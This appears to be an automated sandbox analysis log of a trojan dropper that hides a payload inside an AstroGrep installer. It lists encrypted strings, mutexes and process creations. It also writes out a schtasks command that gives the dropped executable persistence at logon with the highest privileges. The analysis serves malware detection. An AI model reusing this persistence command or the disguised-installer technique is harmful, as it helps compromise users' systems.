                            Source: ASTRO-GREP.EXE.1.dr, zElUlVwqERLYn/eHcZPkAtyHA.csBase64 encoded string: 'QHy8sfXkGmhL4GfCIxO4J1WB7dWaURp1TcEzVJkn3+Ahjg1xP+UJRRGNLO2H1f8OBBUg1zZFbOawMqFIJs9TzA==', 'NGowqIIaRfZK9xE4MaYAMZJNSBiADXG98tScxjas+TYluA/Nyk7JqsIeKhWHRmXvZLhCzwhMhg58B1Wf4D6HcA==', 'R3oLaKXfDr6rAO99i7NEiwrOhtYr7FQkF66mH80NeUrbSGM+wSwyQY2Bz8neKR3fz49dNiaC8H/QRRz9YPVBEA==', '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', 'o/Xn/cSL5J8Elj5me1Jvu5jPcdGocK39F+b7iN3rH9xYXCpn82fCDRksHIog4f12H8eaL6r5cN5hTfF8L8OuV5vt5cSMpqiDwMJnUXyiZqIK8ogznGKiCpNKUkwfOGCL/GjdkWDuSqopmPdskyodHMaouKM2Cm1eqtCpXpGCo5Xuy+XSiscemoxxUnjPYsNP9Kfp+MKdBG/kZnvp1pNne01w/dDztwOiwNpg5cVgCsHgIxL/rBduTMCDjyFgHrdqlZEx5JS6XKNqAj1sBicC/1t3H7uU9ql/2d8qpogt8By3QlziySFwY4R7hQZ+puteC/VfFXS01L9036I7tYE0KxiYs7I2+ca2JaCP3h8LwE/f6s9Dwy0
                            Source: astro-grep.exe.3.dr, zElUlVwqERLYn/eHcZPkAtyHA.csBase64 encoded string: 'QHy8sfXkGmhL4GfCIxO4J1WB7dWaURp1TcEzVJkn3+Ahjg1xP+UJRRGNLO2H1f8OBBUg1zZFbOawMqFIJs9TzA==', 'NGowqIIaRfZK9xE4MaYAMZJNSBiADXG98tScxjas+TYluA/Nyk7JqsIeKhWHRmXvZLhCzwhMhg58B1Wf4D6HcA==', 'R3oLaKXfDr6rAO99i7NEiwrOhtYr7FQkF66mH80NeUrbSGM+wSwyQY2Bz8neKR3fz49dNiaC8H/QRRz9YPVBEA==', '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', 'o/Xn/cSL5J8Elj5me1Jvu5jPcdGocK39F+b7iN3rH9xYXCpn82fCDRksHIog4f12H8eaL6r5cN5hTfF8L8OuV5vt5cSMpqiDwMJnUXyiZqIK8ogznGKiCpNKUkwfOGCL/GjdkWDuSqopmPdskyodHMaouKM2Cm1eqtCpXpGCo5Xuy+XSiscemoxxUnjPYsNP9Kfp+MKdBG/kZnvp1pNne01w/dDztwOiwNpg5cVgCsHgIxL/rBduTMCDjyFgHrdqlZEx5JS6XKNqAj1sBicC/1t3H7uU9ql/2d8qpogt8By3QlziySFwY4R7hQZ+puteC/VfFXS01L9036I7tYE0KxiYs7I2+ca2JaCP3h8LwE/f6s9Dwy0
                            Source: 3.0.ASTRO-GREP.EXE.5f0000.0.unpack, zElUlVwqERLYn/eHcZPkAtyHA.csBase64 encoded string: 'QHy8sfXkGmhL4GfCIxO4J1WB7dWaURp1TcEzVJkn3+Ahjg1xP+UJRRGNLO2H1f8OBBUg1zZFbOawMqFIJs9TzA==', 'NGowqIIaRfZK9xE4MaYAMZJNSBiADXG98tScxjas+TYluA/Nyk7JqsIeKhWHRmXvZLhCzwhMhg58B1Wf4D6HcA==', 'R3oLaKXfDr6rAO99i7NEiwrOhtYr7FQkF66mH80NeUrbSGM+wSwyQY2Bz8neKR3fz49dNiaC8H/QRRz9YPVBEA==', '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', 'o/Xn/cSL5J8Elj5me1Jvu5jPcdGocK39F+b7iN3rH9xYXCpn82fCDRksHIog4f12H8eaL6r5cN5hTfF8L8OuV5vt5cSMpqiDwMJnUXyiZqIK8ogznGKiCpNKUkwfOGCL/GjdkWDuSqopmPdskyodHMaouKM2Cm1eqtCpXpGCo5Xuy+XSiscemoxxUnjPYsNP9Kfp+MKdBG/kZnvp1pNne01w/dDztwOiwNpg5cVgCsHgIxL/rBduTMCDjyFgHrdqlZEx5JS6XKNqAj1sBicC/1t3H7uU9ql/2d8qpogt8By3QlziySFwY4R7hQZ+puteC/VfFXS01L9036I7tYE0KxiYs7I2+ca2JaCP3h8LwE/f6s9Dwy0
                            Source: 3.2.ASTRO-GREP.EXE.5f0000.0.unpack, zElUlVwqERLYn/eHcZPkAtyHA.csBase64 encoded string: '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
                            Source: 13.2.astro-grep.exe.770000.0.unpack, zElUlVwqERLYn/eHcZPkAtyHA.csBase64 encoded string: 'QHy8sfXkGmhL4GfCIxO4J1WB7dWaURp1TcEzVJkn3+Ahjg1xP+UJRRGNLO2H1f8OBBUg1zZFbOawMqFIJs9TzA==', 'NGowqIIaRfZK9xE4MaYAMZJNSBiADXG98tScxjas+TYluA/Nyk7JqsIeKhWHRmXvZLhCzwhMhg58B1Wf4D6HcA==', 'R3oLaKXfDr6rAO99i7NEiwrOhtYr7FQkF66mH80NeUrbSGM+wSwyQY2Bz8neKR3fz49dNiaC8H/QRRz9YPVBEA==', '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', 'o/Xn/cSL5J8Elj5me1Jvu5jPcdGocK39F+b7iN3rH9xYXCpn82fCDRksHIog4f12H8eaL6r5cN5hTfF8L8OuV5vt5cSMpqiDwMJnUXyiZqIK8ogznGKiCpNKUkwfOGCL/GjdkWDuSqopmPdskyodHMaouKM2Cm1eqtCpXpGCo5Xuy+XSiscemoxxUnjPYsNP9Kfp+MKdBG/kZnvp1pNne01w/dDztwOiwNpg5cVgCsHgIxL/rBduTMCDjyFgHrdqlZEx5JS6XKNqAj1sBicC/1t3H7uU9ql/2d8qpogt8By3QlziySFwY4R7hQZ+puteC/VfFXS01L9036I7tYE0KxiYs7I2+ca2JaCP3h8LwE/f6s9Dwy0
                            Source: 13.0.astro-grep.exe.770000.0.unpack, zElUlVwqERLYn/eHcZPkAtyHA.csBase64 encoded string: 'QHy8sfXkGmhL4GfCIxO4J1WB7dWaURp1TcEzVJkn3+Ahjg1xP+UJRRGNLO2H1f8OBBUg1zZFbOawMqFIJs9TzA==', 'NGowqIIaRfZK9xE4MaYAMZJNSBiADXG98tScxjas+TYluA/Nyk7JqsIeKhWHRmXvZLhCzwhMhg58B1Wf4D6HcA==', 'R3oLaKXfDr6rAO99i7NEiwrOhtYr7FQkF66mH80NeUrbSGM+wSwyQY2Bz8neKR3fz49dNiaC8H/QRRz9YPVBEA==', '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', 'o/Xn/cSL5J8Elj5me1Jvu5jPcdGocK39F+b7iN3rH9xYXCpn82fCDRksHIog4f12H8eaL6r5cN5hTfF8L8OuV5vt5cSMpqiDwMJnUXyiZqIK8ogznGKiCpNKUkwfOGCL/GjdkWDuSqopmPdskyodHMaouKM2Cm1eqtCpXpGCo5Xuy+XSiscemoxxUnjPYsNP9Kfp+MKdBG/kZnvp1pNne01w/dDztwOiwNpg5cVgCsHgIxL/rBduTMCDjyFgHrdqlZEx5JS6XKNqAj1sBicC/1t3H7uU9ql/2d8qpogt8By3QlziySFwY4R7hQZ+puteC/VfFXS01L9036I7tYE0KxiYs7I2+ca2JaCP3h8LwE/f6s9Dwy0
                            Source: 17.2.astro-grep.exe.430000.0.unpack, zElUlVwqERLYn/eHcZPkAtyHA.csBase64 encoded string: 'QHy8sfXkGmhL4GfCIxO4J1WB7dWaURp1TcEzVJkn3+Ahjg1xP+UJRRGNLO2H1f8OBBUg1zZFbOawMqFIJs9TzA==', 'NGowqIIaRfZK9xE4MaYAMZJNSBiADXG98tScxjas+TYluA/Nyk7JqsIeKhWHRmXvZLhCzwhMhg58B1Wf4D6HcA==', 'R3oLaKXfDr6rAO99i7NEiwrOhtYr7FQkF66mH80NeUrbSGM+wSwyQY2Bz8neKR3fz49dNiaC8H/QRRz9YPVBEA==', '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', 'o/Xn/cSL5J8Elj5me1Jvu5jPcdGocK39F+b7iN3rH9xYXCpn82fCDRksHIog4f12H8eaL6r5cN5hTfF8L8OuV5vt5cSMpqiDwMJnUXyiZqIK8ogznGKiCpNKUkwfOGCL/GjdkWDuSqopmPdskyodHMaouKM2Cm1eqtCpXpGCo5Xuy+XSiscemoxxUnjPYsNP9Kfp+MKdBG/kZnvp1pNne01w/dDztwOiwNpg5cVgCsHgIxL/rBduTMCDjyFgHrdqlZEx5JS6XKNqAj1sBicC/1t3H7uU9ql/2d8qpogt8By3QlziySFwY4R7hQZ+puteC/VfFXS01L9036I7tYE0KxiYs7I2+ca2JaCP3h8LwE/f6s9Dwy0
                            Source: 17.0.astro-grep.exe.430000.0.unpack, zElUlVwqERLYn/eHcZPkAtyHA.csBase64 encoded string: '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
                            Source: 3.2.ASTRO-GREP.EXE.5f0000.0.unpack, IhLcdtuBuDKw/dZWFTUdsqePoS.cs Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
                            Source: 3.2.ASTRO-GREP.EXE.5f0000.0.unpack, IhLcdtuBuDKw/dZWFTUdsqePoS.cs Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
                            Source: 17.0.astro-grep.exe.430000.0.unpack, IhLcdtuBuDKw/dZWFTUdsqePoS.cs Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
                            Source: 17.0.astro-grep.exe.430000.0.unpack, IhLcdtuBuDKw/dZWFTUdsqePoS.cs Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
                            Source: ASTRO-GREP.EXE.1.dr, IhLcdtuBuDKw/dZWFTUdsqePoS.cs Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
                            Source: ASTRO-GREP.EXE.1.dr, IhLcdtuBuDKw/dZWFTUdsqePoS.cs Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
                            Source: 17.2.astro-grep.exe.430000.0.unpack, IhLcdtuBuDKw/dZWFTUdsqePoS.cs Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
                            Source: 17.2.astro-grep.exe.430000.0.unpack, IhLcdtuBuDKw/dZWFTUdsqePoS.cs Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
                            Source: 13.2.astro-grep.exe.770000.0.unpack, IhLcdtuBuDKw/dZWFTUdsqePoS.cs Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
                            Source: 13.2.astro-grep.exe.770000.0.unpack, IhLcdtuBuDKw/dZWFTUdsqePoS.cs Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
                            Source: 3.0.ASTRO-GREP.EXE.5f0000.0.unpack, IhLcdtuBuDKw/dZWFTUdsqePoS.cs Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
                            Source: 3.0.ASTRO-GREP.EXE.5f0000.0.unpack, IhLcdtuBuDKw/dZWFTUdsqePoS.cs Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
                            Source: astro-grep.exe.3.dr, IhLcdtuBuDKw/dZWFTUdsqePoS.cs Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
                            Source: astro-grep.exe.3.dr, IhLcdtuBuDKw/dZWFTUdsqePoS.cs Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
                            Source: 13.0.astro-grep.exe.770000.0.unpack, IhLcdtuBuDKw/dZWFTUdsqePoS.cs Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
                            Source: 13.0.astro-grep.exe.770000.0.unpack, IhLcdtuBuDKw/dZWFTUdsqePoS.cs Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
                            Source: ICSharpCode.AvalonEdit.dll.5.dr Binary or memory string: <SyntaxDefinition name="XML" extensions=".xml;.xsl;.xslt;.xsd;.manifest;.config;.addin;.xshd;.wxs;.wxi;.wxl;.proj;.csproj;.vbproj;.ilproj;.booproj;.build;.xfrm;.targets;.xaml;.xpt;.xft;.map;.wsdl;.disco;.ps1xml;.nuspec" xmlns="http://icsharpcode.net/sharpdevelop/syntaxdefinition/2008">
                            Source: ICSharpCode.AvalonEdit.dll.5.dr Binary or memory string: <SyntaxDefinition name="XML" extensions=".xml;.xsl;.xslt;.xsd;.manifest;.config;.addin;.xshd;.wxs;.wxi;.wxl;.proj;.csproj;.vbproj;.ilproj;.booproj;.build;.xfrm;.targets;.xaml;.xpt;.xft;.map;.wsdl;.disco;.ps1xml;.nuspec" xmlns="http://icsharpcode.net/sharpdevelop/syntaxdefinition/2008">
                            Source: ICSharpCode.AvalonEdit.dll.5.dr Binary or memory string: c.xml;.xsl;.xslt;.xsd;.manifest;.config;.addin;.xshd;.wxs;.wxi;.wxl;.proj;.csproj;.vbproj;.ilproj;.booproj;.build;.xfrm;.targets;.xaml;.xpt;.xft;.map;.wsdl;.disco;.ps1xml;.nuspec
                            Source: classification engine Classification label: mal52.troj.evad.winEXE@19/26@1/2
                            Source: C:\Users\user\AppData\Local\Temp\ASTROGREP_SETUP_V4.4.7.EXE Code function: 5_2_0040310F EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,ExitProcess,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess
                            Source: C:\Users\user\AppData\Local\Temp\ASTROGREP_SETUP_V4.4.7.EXE Code function: 5_2_00404352 GetDlgItem,SetWindowTextA,SHAutoComplete,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceExA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA
                            Source: C:\Users\user\AppData\Local\Temp\ASTROGREP_SETUP_V4.4.7.EXE Code function: 5_2_0040205E CoCreateInstance,MultiByteToWideChar
                            Source: C:\Users\user\Desktop\ms.exe Code function: 1_2_00A310C0 _memset,OutputDebugStringA,FindResourceA,CreateFileA,SizeofResource,LoadResource,LockResource,WriteFile,FindCloseChangeNotification,ShellExecuteA
                            Source: C:\Users\user\AppData\Local\Temp\ASTROGREP_SETUP_V4.4.7.EXE File created: C:\Program Files (x86)\AstroGrep
                            Source: C:\Users\user\AppData\Local\Temp\ASTRO-GREP.EXE File created: C:\Users\user\AppData\Roaming\astro-grep.exe
                            Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3820:120:WilError_01
                            Source: C:\Users\user\AppData\Roaming\astro-grep.exe Mutant created: \Sessions\1\BaseNamedObjects\Mutex_6SI8OkPnk
                            Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:784:120:WilError_01
                            Source: C:\Users\user\Desktop\ms.exe File created: C:\Users\user\AppData\Local\Temp\ASTRO-GREP.EXE
                            Source: C:\Users\user\AppData\Local\Temp\ASTRO-GREP.EXE Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\user\AppData\Local\Temp\tmp7B21.tmp.bat''
                            Source: C:\Users\user\Desktop\ms.exe Command line argument: shell32.dll 1_2_00A31320
                            Source: C:\Users\user\Desktop\ms.exe Command line argument: ShellExecuteA 1_2_00A31320
                            Source: C:\Users\user\Desktop\ms.exe Command line argument: RBIND 1_2_00A31320
                            Source: ms.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                            Source: C:\Users\user\AppData\Local\Temp\ASTRO-GREP.EXE Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                            Source: C:\Users\user\AppData\Roaming\astro-grep.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                            Source: C:\Users\user\AppData\Roaming\astro-grep.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                            Source: C:\Users\user\Desktop\ms.exe File read: C:\Users\user\Desktop\desktop.ini
                            Source: C:\Users\user\Desktop\ms.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                            Source: C:\Users\user\AppData\Roaming\astro-grep.exe File read: C:\Windows\System32\drivers\etc\hosts
                            Source: C:\Users\user\AppData\Roaming\astro-grep.exe File read: C:\Windows\System32\drivers\etc\hosts
                            Source: ms.exe Virustotal: Detection: 78%
                            Source: unknown Process created: C:\Users\user\Desktop\ms.exe 'C:\Users\user\Desktop\ms.exe'
                            Source: C:\Users\user\Desktop\ms.exe Process created: C:\Users\user\AppData\Local\Temp\ASTRO-GREP.EXE 'C:\Users\user\AppData\Local\Temp\ASTRO-GREP.EXE'
                            Source: C:\Users\user\Desktop\ms.exe Process created: C:\Users\user\AppData\Local\Temp\ASTROGREP_SETUP_V4.4.7.EXE 'C:\Users\user\AppData\Local\Temp\ASTROGREP_SETUP_V4.4.7.EXE'
                            Source: C:\Users\user\AppData\Local\Temp\ASTRO-GREP.EXE Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c schtasks /create /f /sc onlogon /rl highest /tn 'astro-grep' /tr ''C:\Users\user\AppData\Roaming\astro-grep.exe'' & exit
                            Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Users\user\AppData\Local\Temp\ASTRO-GREP.EXE Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\user\AppData\Local\Temp\tmp7B21.tmp.bat''
                            Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
